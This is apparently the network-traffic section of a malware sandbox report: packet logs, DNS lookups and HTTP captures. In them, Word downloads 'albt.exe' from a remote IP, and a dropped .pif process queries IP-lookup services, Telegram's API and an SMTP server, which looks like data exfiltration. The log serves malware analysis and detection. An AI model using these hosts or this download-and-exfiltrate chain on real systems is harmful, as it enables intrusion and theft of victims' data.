                                                                                                                                                                        Jan 6, 2025 07:53:49.287715912 CET49798443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:49.288224936 CET49798443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:49.292828083 CET4980080192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:49.297645092 CET8049800158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:49.298558950 CET4980080192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:49.298682928 CET4980080192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:49.303464890 CET8049800158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:49.613441944 CET44349799188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:49.615343094 CET49799443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:49.615364075 CET44349799188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:49.762696981 CET44349799188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:49.762759924 CET44349799188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:49.762844086 CET49799443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:49.763340950 CET49799443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:49.766405106 CET4979780192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:49.766962051 CET4980180192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:49.771411896 CET8049797158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:49.771498919 CET4979780192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:49.771774054 CET8049801158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:49.771853924 CET4980180192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:49.771998882 CET4980180192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:49.776788950 CET8049801158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:49.856524944 CET5874979646.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:49.857033014 CET49796587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:53:49.861927032 CET5874979646.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:49.892061949 CET8049800158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:49.893390894 CET49802443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:49.893430948 CET44349802188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:49.893505096 CET49802443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:49.893754005 CET49802443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:49.893765926 CET44349802188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:49.946894884 CET4980080192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:50.139569998 CET5874979646.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:50.183636904 CET49796587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:53:50.256346941 CET49796587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:53:50.261117935 CET5874979646.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:50.356414080 CET44349802188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:50.359927893 CET49802443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:50.359945059 CET44349802188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:50.496886969 CET44349802188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:50.496963978 CET44349802188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:50.497030973 CET49802443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:50.497556925 CET49802443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:50.501205921 CET4980080192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:50.502490044 CET4980380192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:50.506243944 CET8049800158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:50.506293058 CET4980080192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:50.507327080 CET8049803158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:50.507401943 CET4980380192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:50.507527113 CET4980380192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:50.512260914 CET8049803158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:50.523679972 CET5874979646.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:50.524101973 CET49796587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:53:50.529016018 CET5874979646.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:50.774971008 CET8049801158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:50.776331902 CET49804443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:50.776388884 CET44349804188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:50.776468992 CET49804443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:50.776719093 CET49804443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:50.776734114 CET44349804188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:50.822050095 CET4980180192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:50.823983908 CET5874979646.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:50.823997974 CET5874979646.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:50.824074030 CET49796587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:53:50.841664076 CET49796587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:53:50.855149984 CET5874979646.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:51.114218950 CET5874979646.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:51.118678093 CET49796587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:53:51.123605967 CET5874979646.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:51.230882883 CET44349804188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:51.240593910 CET49804443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:51.240637064 CET44349804188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:51.368079901 CET44349804188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:51.368149042 CET44349804188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:51.368249893 CET49804443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:51.368727922 CET49804443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:51.402280092 CET5874979646.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:51.404356956 CET49796587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:53:51.409145117 CET5874979646.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:51.412276983 CET4980180192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:51.413157940 CET49805443192.168.2.4149.154.167.220
                                                                                                                                                                        Jan 6, 2025 07:53:51.413218021 CET44349805149.154.167.220192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:51.414500952 CET49805443192.168.2.4149.154.167.220
                                                                                                                                                                        Jan 6, 2025 07:53:51.414927959 CET49805443192.168.2.4149.154.167.220
                                                                                                                                                                        Jan 6, 2025 07:53:51.414942980 CET44349805149.154.167.220192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:51.417345047 CET8049801158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:51.417431116 CET4980180192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:51.669214964 CET5874979646.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:51.669533968 CET49796587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:53:51.674516916 CET5874979646.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:51.939138889 CET5874979646.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:51.942822933 CET49796587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:53:51.947922945 CET5874979646.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:52.024435997 CET44349805149.154.167.220192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:52.024658918 CET49805443192.168.2.4149.154.167.220
                                                                                                                                                                        Jan 6, 2025 07:53:52.026391029 CET49805443192.168.2.4149.154.167.220
                                                                                                                                                                        Jan 6, 2025 07:53:52.026410103 CET44349805149.154.167.220192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:52.026860952 CET44349805149.154.167.220192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:52.032277107 CET49805443192.168.2.4149.154.167.220
                                                                                                                                                                        Jan 6, 2025 07:53:52.079344034 CET44349805149.154.167.220192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:52.207247972 CET5874979646.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:52.207494974 CET49796587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:53:52.212342024 CET5874979646.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:52.312840939 CET44349805149.154.167.220192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:52.312890053 CET44349805149.154.167.220192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:52.312983990 CET49805443192.168.2.4149.154.167.220
                                                                                                                                                                        Jan 6, 2025 07:53:52.318011999 CET49805443192.168.2.4149.154.167.220
                                                                                                                                                                        Jan 6, 2025 07:53:59.342622042 CET44349816188.114.97.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:59.342885971 CET49816443192.168.2.4188.114.97.3
                                                                                                                                                                        Jan 6, 2025 07:53:59.343131065 CET49816443192.168.2.4188.114.97.3
                                                                                                                                                                        Jan 6, 2025 07:53:59.373682022 CET4981580192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:59.374829054 CET49818443192.168.2.4149.154.167.220
                                                                                                                                                                        Jan 6, 2025 07:53:59.374857903 CET44349818149.154.167.220192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:59.374933958 CET49818443192.168.2.4149.154.167.220
                                                                                                                                                                        Jan 6, 2025 07:53:59.375348091 CET49818443192.168.2.4149.154.167.220
                                                                                                                                                                        Jan 6, 2025 07:53:59.375359058 CET44349818149.154.167.220192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:59.379632950 CET8049815158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:59.379705906 CET4981580192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:59.584614038 CET5874980946.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:59.585045099 CET49809587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:53:59.585112095 CET49809587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:53:59.585306883 CET49809587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:53:59.585306883 CET49809587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:53:59.585328102 CET49809587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:53:59.591434002 CET5874980946.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:59.591445923 CET5874980946.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:59.591496944 CET5874980946.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:59.591506004 CET5874980946.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:59.591516018 CET5874980946.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:59.591937065 CET5874980946.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:59.591945887 CET5874980946.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:59.591970921 CET5874980946.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:59.591979980 CET5874980946.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:59.591989040 CET5874980946.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:59.883157015 CET5874980946.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:59.931318998 CET49809587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:00.155353069 CET44349818149.154.167.220192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:00.155461073 CET49818443192.168.2.4149.154.167.220
                                                                                                                                                                        Jan 6, 2025 07:54:00.157008886 CET49818443192.168.2.4149.154.167.220
                                                                                                                                                                        Jan 6, 2025 07:54:00.157018900 CET44349818149.154.167.220192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:00.157253027 CET44349818149.154.167.220192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:00.158710003 CET49818443192.168.2.4149.154.167.220
                                                                                                                                                                        Jan 6, 2025 07:54:00.199335098 CET44349818149.154.167.220192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:00.223993063 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:00.224208117 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:00.229068041 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:00.405301094 CET44349818149.154.167.220192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:00.405383110 CET44349818149.154.167.220192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:00.405529976 CET49818443192.168.2.4149.154.167.220
                                                                                                                                                                        Jan 6, 2025 07:54:00.407757044 CET49818443192.168.2.4149.154.167.220
                                                                                                                                                                        Jan 6, 2025 07:54:00.506345987 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:00.506644011 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:00.511725903 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:00.772526026 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:00.772974968 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:00.777899027 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:01.069084883 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:01.069099903 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:01.069314003 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:01.070899963 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:01.075764894 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:01.335069895 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:01.338223934 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:01.343137980 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:01.620884895 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:01.621249914 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:01.626121044 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:01.883533955 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:01.884022951 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:01.888906956 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:02.152287006 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:02.152559996 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:02.157396078 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:02.415232897 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:02.415724993 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:02.420519114 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:02.677983046 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:02.678246021 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:02.683099985 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:02.943222046 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:02.943944931 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:02.943981886 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:02.944014072 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:02.944025993 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:02.948829889 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:02.948842049 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:02.948858976 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:02.948867083 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:03.382610083 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:03.431324959 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:04.898358107 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:04.903281927 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:05.169238091 CET5874981746.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:05.169872046 CET49817587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:05.170996904 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:05.175874949 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:05.176011086 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:06.459235907 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:06.459461927 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:06.464342117 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:06.566101074 CET4979480192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:54:06.743177891 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:06.743597031 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:06.748449087 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:06.782367945 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:06.787259102 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:06.787345886 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:07.031544924 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.032186031 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:07.036957979 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.324462891 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.324481964 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.324549913 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:07.455106020 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.457653046 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:07.462548018 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.671569109 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.672250032 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:07.677911997 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.723654985 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.724638939 CET49845587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:07.730192900 CET5874984546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.956434965 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:07.956732035 CET49855587192.168.2.446.151.208.21
                                                                                                                                                                        Jan 6, 2025 07:54:07.961563110 CET5874985546.151.208.21192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:54:08.010129929 CET5874984546.151.208.21192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 6, 2025 07:53:16.832300901 CET | 53707 | 53 | 192.168.2.4 | 1.1.1.1
Jan 6, 2025 07:53:16.845573902 CET | 53 | 53707 | 1.1.1.1 | 192.168.2.4
Jan 6, 2025 07:53:25.316695929 CET | 52064 | 53 | 192.168.2.4 | 1.1.1.1
Jan 6, 2025 07:53:25.323537111 CET | 53 | 52064 | 1.1.1.1 | 192.168.2.4
Jan 6, 2025 07:53:26.450095892 CET | 52312 | 53 | 192.168.2.4 | 1.1.1.1
Jan 6, 2025 07:53:26.457385063 CET | 53 | 52312 | 1.1.1.1 | 192.168.2.4
Jan 6, 2025 07:53:39.646120071 CET | 53439 | 53 | 192.168.2.4 | 1.1.1.1
Jan 6, 2025 07:53:39.652966976 CET | 53 | 53439 | 1.1.1.1 | 192.168.2.4
Jan 6, 2025 07:53:47.643543959 CET | 54511 | 53 | 192.168.2.4 | 1.1.1.1
Jan 6, 2025 07:53:48.078732014 CET | 53 | 54511 | 1.1.1.1 | 192.168.2.4
Jan 6, 2025 07:53:57.518140078 CET | 57060 | 53 | 192.168.2.4 | 1.1.1.1
Jan 6, 2025 07:53:57.525367975 CET | 53 | 57060 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 6, 2025 07:53:16.832300901 CET | 192.168.2.4 | 1.1.1.1 | 0x6c06 | Standard query (0) | amazonenviro.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:53:25.316695929 CET | 192.168.2.4 | 1.1.1.1 | 0xcdf9 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:53:26.450095892 CET | 192.168.2.4 | 1.1.1.1 | 0x2b7b | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:53:39.646120071 CET | 192.168.2.4 | 1.1.1.1 | 0xffe3 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:53:47.643543959 CET | 192.168.2.4 | 1.1.1.1 | 0x2668 | Standard query (0) | mail.irco.com.sa | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:53:57.518140078 CET | 192.168.2.4 | 1.1.1.1 | 0xb464 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                        Jan 6, 2025 07:53:16.845573902 CET1.1.1.1192.168.2.40x6c06No error (0)amazonenviro.com166.62.27.188A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:25.323537111 CET1.1.1.1192.168.2.40xcdf9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:25.323537111 CET1.1.1.1192.168.2.40xcdf9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:25.323537111 CET1.1.1.1192.168.2.40xcdf9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:25.323537111 CET1.1.1.1192.168.2.40xcdf9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:25.323537111 CET1.1.1.1192.168.2.40xcdf9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:25.323537111 CET1.1.1.1192.168.2.40xcdf9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:26.457385063 CET1.1.1.1192.168.2.40x2b7bNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:26.457385063 CET1.1.1.1192.168.2.40x2b7bNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:39.652966976 CET1.1.1.1192.168.2.40xffe3No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:48.078732014 CET1.1.1.1192.168.2.40x2668No error (0)mail.irco.com.sa46.151.208.21A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:57.525367975 CET1.1.1.1192.168.2.40xb464No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                        Jan 6, 2025 07:53:57.525367975 CET1.1.1.1192.168.2.40xb464No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                        • amazonenviro.com
                                                                                                                                                                        • reallyfreegeoip.org
                                                                                                                                                                        • api.telegram.org
                                                                                                                                                                        • 147.124.216.113
                                                                                                                                                                        • checkip.dyndns.org

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49739 | 147.124.216.113 | 80 | 7412 | C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:53:14.671390057 CET | 181 | OUT | GET /albt.exe HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: en-ch
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: 147.124.216.113
Jan 6, 2025 07:53:15.192961931 CET | 1236 | IN | HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Last-Modified: Sun, 05 Jan 2025 23:00:50 GMT
    Accept-Ranges: bytes
    ETag: "ef51f5a9c55fdb1:0"
    Server: Microsoft-IIS/8.5
    Date: Mon, 06 Jan 2025 06:53:13 GMT
    Content-Length: 1161216


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49753 | 158.101.44.242 | 80 | 8112 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:53:25.358736038 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 6, 2025 07:53:25.951505899 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Mon, 06 Jan 2025 06:53:25 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 1f16da6f836abbdd3acfce29213a8e74
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 07:53:25.956243038 CET | 127 | OUT | GET / HTTP/1.1
